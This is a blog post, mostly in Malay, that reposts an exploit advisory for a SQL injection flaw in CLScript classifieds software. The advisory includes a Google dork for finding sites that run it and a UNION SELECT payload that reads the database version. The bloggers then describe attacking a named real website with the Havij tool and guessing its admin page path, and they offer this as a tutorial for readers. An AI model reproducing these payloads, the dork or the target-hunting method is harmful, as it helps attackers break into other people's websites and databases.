Kami kongsikan Bug pada CMS CLScript yang di temui pada 27/4/2010 oleh 41.w4r10r
# Exploit Title: CLScript.com Classifieds Software SQL Injection
Vunerability
# Date: 27-4-2010
# Author: 41.w4r10r
# Vendor Link : http://www.clscript.com/
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Dork : intext:"Powered by CLscript.com"
# Code :
-----------------------------------------------------------------
#################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber
Warriors]
#Thanks:
SaiSatish,FB1H2S,Godwin_Austin,Micr0,Mannu,Harin,Jappy,Dark_Blue,Hoodlum
#Shoutz: hg_H@x0r,r45c4l,Yash,Hackuin,unn4m3d
#Catch us at www.andhrahackers.com or www.teamicw.in
#################################################################
Exploited Link :
1) http://example.com/help-details.php?hpId=-38'
Live Demo :
1)http://example.com/help-details.php?hpId=-38+union+select+all+1,version(),3,4,5,6,7--
#41.w4r10r mailto:41.w4r10r@andhrahackers.com
Kami mencuba CMS ini pada website Farmersindia. Untuk mencari Admin page, kami menggunakan Havij agar lebih cepat dan mudah haha...Tapi teryata usaha kami sia-sia kerana Havij tidak menemukan sebarang admin page.
Seperti yang kita tahu bahawa ianya adalah CMS CLScript dan kebiasaannya ianya ada tulis di bawah website "Powered by CLScript.com" jika ianya tidak di ubah oleh admin. So, jom terjah website CLScript.com mana tahu ada maklumat yang dapat membantu kita betul tak? haha...
Admin page demo tersebut www.clpage24.com/cladmin/ dan /cladmin/ merupakan directory untuk admin page. Apa kata cuba dekat www.farmersindia.com/cladmin/. Admin page kan? hehe...Di harap tutorial Ini membantu korang semua. Kalau CMS percuma, langsung aja download CMS ya mas.*Susah juga nak berkongsi ni hehe...
No comments:
Post a Comment